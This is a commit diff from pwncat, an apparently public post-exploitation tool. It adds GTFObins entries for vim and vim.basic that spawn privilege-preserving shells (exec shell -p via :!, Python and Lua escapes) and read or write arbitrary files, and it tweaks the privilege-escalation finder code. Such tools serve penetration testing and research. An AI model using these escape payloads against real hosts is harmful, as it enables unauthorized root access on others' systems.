1
0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-27 19:04:15 +01:00

Got vim seemingly working as a GTFObin...

This commit is contained in:
John Hammond 2020-05-23 04:34:37 -04:00
parent 3801b50f14
commit 2eb9487e64
5 changed files with 66 additions and 16 deletions

View File

@ -879,19 +879,19 @@
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':!{shell}'", "-c", "'quit'"],
"args": ["-c", "':!exec {shell} -p'", "-c", "':q'"],
// Include an extra newline to be sure to exit vim itself.
"exit": "exit\n\n"
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"]
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"]
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
},
{
"type": "shell",
@ -907,10 +907,47 @@
{
"type": "write",
"stream": "print",
"payload": "{command} >/dev/null",
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"]
"payload": "{cat} - | {command}",
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"],
"exit": "{ctrl_d}"
}
],
"vim.basic": [
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':!exec {shell} -p'", "-c", "':q'"],
// Include an extra newline to be sure to exit vim itself.
"exit": "exit\n\n"
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':lua os.execute(\"reset; exec {shell}\")'", "-c", "'quit'"]
},
{
"type": "read",
"stream": "print",
"payload": "{command}",
"args": ["-es" ,"'+%print'" ,"'+:q!'", "{lfile}"]
},
{
"type": "write",
"stream": "print",
"payload": "{cat} - | {command}",
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"],
"exit": "{ctrl_d}"
}
// Vim can PROBABLY file write... but I have not figured that out just yet.
],
//-------------------------------------------------------------------
"wish": [

View File

@ -9,10 +9,6 @@ from sqlalchemy.exc import InvalidRequestError
import warnings
from sqlalchemy import exc as sa_exc
# Ignore SQL Alchemy warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=sa_exc.SAWarning)
import pwncat
from pwncat import util
from pwncat.remote import Victim
@ -80,5 +76,11 @@ def main():
if __name__ == "__main__":
# Ignore SQL Alchemy warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=sa_exc.SAWarning)
main()
sys.exit(0)

View File

@ -238,7 +238,7 @@ class CommandParser:
# We have a connection! Go back to raw mode
pwncat.victim.state = State.RAW
self.running = False
except Exception as exc:
except (Exception, KeyboardInterrupt) as exc:
traceback.print_exc()
continue
@ -299,7 +299,7 @@ class CommandParser:
command.parser.prog = prog_name
except SystemExit:
# The arguments were icncorrect
# The arguments were incorrect
return

View File

@ -265,7 +265,7 @@ class MethodWrapper:
return self.method.build_payload(self.binary_path, **kwargs)
def exit(self, **kwargs) -> str:
return self.method.binary.gtfo.resolve_binaries(
original = self.method.binary.gtfo.resolve_binaries(
self.method.exit,
ctrl_c=ControlCodes.CTRL_C,
ctrl_z=ControlCodes.CTRL_Z,
@ -275,6 +275,11 @@ class MethodWrapper:
**kwargs,
)
if original == "" and Capability.SHELL in self.cap:
original = "exit\n"
return original
def input(self, **kwargs) -> str:
return self.method.binary.gtfo.resolve_binaries(
self.method.input,

View File

@ -277,12 +277,14 @@ class Finder:
for technique in techniques:
if Capability.SHELL in technique.capabilities:
try:
# Attempt our basic, known technique
shlvl = pwncat.victim.getenv("SHLVL")
exit_script = technique.method.execute(technique)
pwncat.victim.flush_output(some=True)
# Reset the terminal to ensure we are stable
time.sleep(0.1)
time.sleep(0.1) # This seems inevitable for some privescs...
pwncat.victim.reset()
# Check that we actually succeeded
@ -300,7 +302,9 @@ class Finder:
# Get out of this subshell. We don't need it
# pwncat.victim.process(exit_script, delim=False)
pwncat.victim.run(exit_script, wait=False)
time.sleep(0.1) # Still inevitable for some privescs...
pwncat.victim.recvuntil("\n")
# Clean up whatever mess was left over
@ -312,6 +316,8 @@ class Finder:
# Continue on as if it hadn't worked.
except PrivescError:
pass
except ValueError:
raise PrivescError
if Capability.READ in technique.capabilities:
readers.append(technique)
if Capability.WRITE in technique.capabilities: